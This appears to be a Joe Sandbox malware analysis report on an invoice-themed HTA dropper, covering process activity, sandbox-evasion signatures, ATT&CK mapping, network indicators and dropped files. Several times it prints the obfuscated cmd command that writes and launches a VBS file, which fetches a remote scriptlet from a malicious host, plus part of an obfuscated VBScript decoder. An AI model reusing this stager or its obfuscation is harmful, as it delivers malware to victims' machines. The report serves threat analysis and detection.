Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected

Data Obfuscation

barindex
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO^">C:\\Users\\Public\\uoxx0.vbs&echo|set /p=^"bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")^">>C:\\Users\\Public\\uoxx0.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO^">C:\\Users\\Public\\uoxx0.vbs&echo|set /p=^"bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")^">>C:\\Users\\Public\\uoxx0.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbsJump to behavior

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\Public\uoxx0.vbsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_BIOS
Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: wscript.exe, 00000009.00000002.2067668967.0000000002AC6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2067188784.0000000002AC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0Hyper-V 2008 Beta or RC0BGH9?
Source: wscript.exe, 00000009.00000003.2067188784.0000000002AC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareFIWIJ*9
Source: wscript.exe, 00000009.00000002.2067668967.0000000002AC6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2067188784.0000000002AC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-VFWHN19
Source: wscript.exe, 00000009.00000002.2067668967.0000000002AC6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2067188784.0000000002AC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V 2008 R2XGQXGQXGQ
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.2067668967.0000000002AB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
Source: wscript.exe, 00000009.00000003.2067188784.0000000002AC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .VMware Virtual PlatformVIQ
Source: wscript.exe, 00000009.00000002.2067668967.0000000002AC6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2067188784.0000000002AC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V 2008 RTMMTHMTHM6 w?

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 92.205.57.102 443Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO^">C:\\Users\\Public\\uoxx0.vbs&echo|set /p=^"bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")^">>C:\\Users\\Public\\uoxx0.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO" 1>C:\\Users\\Public\\uoxx0.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")" 1>>C:\\Users\\Public\\uoxx0.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\uoxx0.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /k echo|set /p=^"owcbge=".":mwpd="i":aym5="g":bzb2en=":":geto^">c:\\users\\public\\uoxx0.vbs&echo|set /p=^"bject("scr"+mwpd+"pt"+bzb2en+"ht"+"tps"+bzb2en+"//102"+owcbge+"57"+owcbge+"205"+owcbge+"92"+owcbge+"host"+owcbge+"secureserver"+owcbge+"net//"+aym5+"1")^">>c:\\users\\public\\uoxx0.vbs&c:\\windows\\system32\\cmd.exe /c start c:\\users\\public\\uoxx0.vbs
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /k echo|set /p=^"owcbge=".":mwpd="i":aym5="g":bzb2en=":":geto^">c:\\users\\public\\uoxx0.vbs&echo|set /p=^"bject("scr"+mwpd+"pt"+bzb2en+"ht"+"tps"+bzb2en+"//102"+owcbge+"57"+owcbge+"205"+owcbge+"92"+owcbge+"host"+owcbge+"secureserver"+owcbge+"net//"+aym5+"1")^">>c:\\users\\public\\uoxx0.vbs&c:\\windows\\system32\\cmd.exe /c start c:\\users\\public\\uoxx0.vbsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information111
Scripting
Valid Accounts2
Windows Management Instrumentation
111
Scripting
111
Process Injection
1
Masquerading
OS Credential Dumping11
Security Software Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts11
Command and Scripting Interpreter
1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)111
Process Injection
Security Account Manager1
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information
NTDS33
System Information Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1493145 Sample: Factura - XwgyvMuOAO.hta Startdate: 15/08/2024 Architecture: WINDOWS Score: 96 30 102.57.205.92.host.secureserver.net 2->30 36 Antivirus detection for URL or domain 2->36 38 Multi AV Scanner detection for submitted file 2->38 40 Sigma detected: Suspicious MSHTA Child Process 2->40 42 5 other signatures 2->42 9 mshta.exe 1 2->9         started        signatures3 process4 signatures5 44 Obfuscated command line found 9->44 12 cmd.exe 1 9->12         started        process6 process7 14 cmd.exe 3 2 12->14         started        16 cmd.exe 2 12->16         started        20 conhost.exe 12->20         started        22 3 other processes 12->22 file8 24 wscript.exe 14 14->24         started        28 C:\Users\Public\uoxx0.vbs, ASCII 16->28 dropped 34 Command shell drops VBS files 16->34 signatures9 process10 dnsIp11 32 102.57.205.92.host.secureserver.net 92.205.57.102, 443, 49706, 49707 GD-EMEA-DC-SXB1DE Germany 24->32 46 System process connects to network (likely due to code injection or exploit) 24->46 signatures12

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Factura - XwgyvMuOAO.hta26%ReversingLabsScript-JS.Packed.Generic
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://102.57.205.92.host.secureserver.net/g1/1100%Avira URL Cloudmalware
https://102.57.205.92.host.secureserver.net/100%Avira URL Cloudmalware
https://102.57.205.92.host.secureserver.net/jgseaHOSHOSHO100%Avira URL Cloudmalware
https://102.57.205.92.host.secureserver.net/g1/J100%Avira URL Cloudmalware
hTTps://102.57.205.92.hostC0%Avira URL Cloudsafe
https://102.57.205.92.host.secureserver.net//g1100%Avira URL Cloudmalware
hTTps://102.57.205.92.host.secureserverM20%Avira URL Cloudsafe
https://102.57.205.92.host.secureserver.net//g1Q100%Avira URL Cloudmalware
hTTps://102.57.2050%Avira URL Cloudsafe
hTTps://102.57.205.92.host.secureserver.net//100%Avira URL Cloudmalware
hTTps://102.57.205.92.host.0%Avira URL Cloudsafe
hTTps://102.57.205.92.0%Avira URL Cloudsafe
hTTps://102.57.205.920%Avira URL Cloudsafe
hTTps://102.57010%Avira URL Cloudsafe
https://102.57.205.92.host.secureserver.net/g1/e100%Avira URL Cloudmalware
hTTps://102.57.205.0%Avira URL Cloudsafe
https://102.57.205.92.host.secureserver.net/g1/B100%Avira URL Cloudmalware
https://102.57.205.92.host.secureserver.net/QKFQKFQKFQKFQKFQKFQKFQKFQKFQKFQFQICQICQIC100%Avira URL Cloudmalware
hTTps://102.57.graphy0%Avira URL Cloudsafe
hTTps://102.57.205.92.host.secureserver.net//g100%Avira URL Cloudmalware
https://102.57.205.92.host.secureserver.net/g1/100%Avira URL Cloudmalware
hTTps://102.57.205.92.host.secureserver.0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
102.57.205.92.host.secureserver.net
92.205.57.102
truetrue
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://102.57.205.92.host.secureserver.net//g1true
    • Avira URL Cloud: malware
    unknown
    https://102.57.205.92.host.secureserver.net/g1/true
    • Avira URL Cloud: malware
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://102.57.205.92.host.secureserver.net/jgseaHOSHOSHOwscript.exe, 00000009.00000002.2067668967.0000000002A9B000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    unknown
    hTTps://102.57.205wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://102.57.205.92.host.secureserver.net/g1/1wscript.exe, 00000009.00000003.2052587425.0000000002ACE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2063537527.0000000002ACE000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    unknown
    hTTps://102.57.205.92.hostCwscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://102.57.205.92.host.secureserver.net//g1Qwscript.exe, 00000009.00000002.2067668967.0000000002A9B000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    unknown
    hTTps://102.57.205.92.host.secureserver.net//wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    unknown
    https://102.57.205.92.host.secureserver.net/wscript.exe, 00000009.00000002.2067668967.0000000002A9B000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    unknown
    hTTps://102.57.205.92.host.secureserverM2wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://102.57.205.92.host.secureserver.net/g1/Jwscript.exe, 00000009.00000003.2063537527.0000000002ACE000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    unknown
    hTTps://102.57.205.92.wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://102.57.205.92.host.secureserver.net/g1/ewscript.exe, 00000009.00000002.2067668967.0000000002A9B000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    unknown
    hTTps://102.5701wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    hTTps://102.57.205.92.host.wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    hTTps://102.57.205.92.host.secureserver.net//gwscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    unknown
    https://102.57.205.92.host.secureserver.net/g1/Bwscript.exe, 00000009.00000002.2067668967.0000000002A9B000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    unknown
    hTTps://102.57.205.92.host.secureserver.net//g1wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmpfalse
      unknown
      https://102.57.205.92.host.secureserver.net/QKFQKFQKFQKFQKFQKFQKFQKFQKFQKFQFQICQICQICwscript.exe, 00000009.00000002.2067668967.0000000002AC6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2067188784.0000000002AC5000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      hTTps://102.57.205.wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      hTTps://102.57.graphywscript.exe, 00000009.00000002.2067668967.0000000002A38000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      hTTps://102.57.205.92wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      hTTps://102.57.205.92.host.secureserver.wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      92.205.57.102
      102.57.205.92.host.secureserver.netGermany
      8972GD-EMEA-DC-SXB1DEtrue
      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1493145
      Start date and time:2024-08-15 00:57:08 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 4m 19s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:12
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:Factura - XwgyvMuOAO.hta
      Detection:MAL
      Classification:mal96.evad.winHTA@17/3@1/1
      EGA Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 3
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .hta
      • Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe, svchost.exe
      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
      • Execution Graph export aborted for target mshta.exe, PID 3788 because there are no executed function
      • Execution Graph export aborted for target wscript.exe, PID 2220 because there are no executed function
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • VT rate limit hit for: Factura - XwgyvMuOAO.hta
      No simulations
      No context
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      GD-EMEA-DC-SXB1DEhttp://www.GMCCorsehill.co.ukGet hashmaliciousUnknownBrowse
      • 92.205.170.174
      sora.sh4.elfGet hashmaliciousMiraiBrowse
      • 188.139.32.243
      https://mgmsoftair.com/modules/simpleimportproduct/fire.html#chaewoo.park@hyundaielevator.comGet hashmaliciousHTMLPhisherBrowse
      • 92.204.53.252
      3AV1PyEQ16.elfGet hashmaliciousUnknownBrowse
      • 46.163.111.242
      b2bXo6vmDm.exeGet hashmaliciousSystemBCBrowse
      • 92.205.13.202
      file.exeGet hashmaliciousSystemBCBrowse
      • 92.205.13.202
      file.exeGet hashmaliciousSystemBCBrowse
      • 80.67.29.4
      LisectAVT_2403002B_59.dllGet hashmaliciousEmotetBrowse
      • 85.25.120.45
      LisectAVT_2403002C_119.exeGet hashmaliciousBdaejec, SodinokibiBrowse
      • 5.175.14.247
      LisectAVT_2403002C_62.dllGet hashmaliciousEmotetBrowse
      • 83.169.21.32
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      37f463bf4616ecd445d4a1937da06e19z9T__VAUSTRIATURK-TEKL__F.exeGet hashmaliciousFormBook, GuLoaderBrowse
      • 92.205.57.102
      z1_____________.exeGet hashmaliciousFormBook, GuLoaderBrowse
      • 92.205.57.102
      PDFixers.exeGet hashmaliciousUnknownBrowse
      • 92.205.57.102
      55892.vbsGet hashmaliciousFormBook, GuLoaderBrowse
      • 92.205.57.102
      WKORlhj1t7.exeGet hashmaliciousUnknownBrowse
      • 92.205.57.102
      8Pua5fRt67.exeGet hashmaliciousUnknownBrowse
      • 92.205.57.102
      jvXkaS2YTX.exeGet hashmaliciousUnknownBrowse
      • 92.205.57.102
      file.exeGet hashmaliciousUnknownBrowse
      • 92.205.57.102
      sihost.exeGet hashmaliciousGuLoaderBrowse
      • 92.205.57.102
      C0XWmZAnYk.exeGet hashmaliciousBabuk, DjvuBrowse
      • 92.205.57.102
      No context
      Process:C:\Windows\SysWOW64\cmd.exe
      File Type:ASCII text, with no line terminators
      Category:modified
      Size (bytes):196
      Entropy (8bit):4.743758269240463
      Encrypted:false
      SSDEEP:3:IuzAS1uHGMcIVC/vXXC084GRnJm+oNxHshuoRMvonOpQoFQlVodQot/onXzAX+NZ:3xK5VC/vNfwJ389AOpjCOdjtQcX10rHp
      MD5:485C2046DF0739BADDEEB7BF708817FE
      SHA1:9018871ECE360C4AF31B7F598D486BFE66E197BD
      SHA-256:7B76160A0F32E6C9B3E2C7971791102BB3FDBBE284059CF2D3554504D1C89D18
      SHA-512:D5E04E9E98AF5E137BFE7CEC9532BD238620F16890F9C435A0DB8B863F2B6C7EA3012A9DE65EA56B286CBD2BEE150A1A2870426B8C62E488C48D1AD4DA42B60E
      Malicious:true
      Reputation:low
      Preview:OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetObject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")
      Process:C:\Windows\SysWOW64\wscript.exe
      File Type:XML 1.0 document, ASCII text, with very long lines (2993), with CRLF line terminators
      Category:dropped
      Size (bytes):25760
      Entropy (8bit):5.917394427727027
      Encrypted:false
      SSDEEP:384:EkxQpkVWgD0tFCx/n7yXG888Yd3NMthzY82m5ZZsk3zpoAqaLpNlTbvfD3H:ZxM+/2XG7Mthf2E9CkNJD3
      MD5:1E7281E92D2BEA201B60EC3F8CC272A7
      SHA1:362C0BF7944FA925E5E5F1F72FA1CA9426DD6CD2
      SHA-256:B60BD924EF1844CE68DED617FB9D7F72894F6CD5CEB2D526C05356DBC4AB2BCD
      SHA-512:7F7CD853046E73CEA5FEC4BB59AEB5439AEB1AB9A5FFA848508001E931B84E7F13F4C60956FCD589FD28DEA94E51CDE85CBE07370FD387958C5D3BFE1D5E8F5A
      Malicious:false
      Reputation:low
      Preview:<?xml version="1.0" encoding="utf-8" ?>..<component id="component2">......<script language="VBScript">..<![CDATA[......function dejKxG77YT_17(kgntbIbRvDj_26, WwlnNyCZZ772S_1)..Dim JkcpS5XJGqhXLQOcqBvk0_27, VdoWzx9CHt3490LzCl_28..JkcpS5XJGqhXLQOcqBvk0_27 = asc(Mid(kgntbIbRvDj_26,1,1)) - 65..kgntbIbRvDj_26 = Mid(kgntbIbRvDj_26,2,Len(kgntbIbRvDj_26)-1)..Dim pluG8YQf_29..Dim uhRJ5YCUnUl22flp04_30..VdoWzx9CHt3490LzCl_28 = "".. while (Len(kgntbIbRvDj_26) > 0).. Gx4M7Y9zopF7CmljVmP0BE_80 = Mid(kgntbIbRvDj_26,1,1) .. pluG8YQf_29 = (asc(Gx4M7Y9zopF7CmljVmP0BE_80)-65) .. uhRJ5YCUnUl22flp04_30 = (asc(Mid(kgntbIbRvDj_26,2,1))-65).. VdoWzx9CHt3490LzCl_28 = VdoWzx9CHt3490LzCl_28 & (Chr(( (pluG8YQf_29) * 25 + uhRJ5YCUnUl22flp04_30 - JkcpS5XJGqhXLQOcqBvk0_27 - WwlnNyCZZ772S_1))) .. kgntbIbRvDj_26 = Mid(kgntbIbRvDj_26,3,Len(kgntbIbRvDj_26)-2).... wEnd.. .. dejKxG77YT_17 = VdoWzx9CHt3490LzCl_28..end function........const 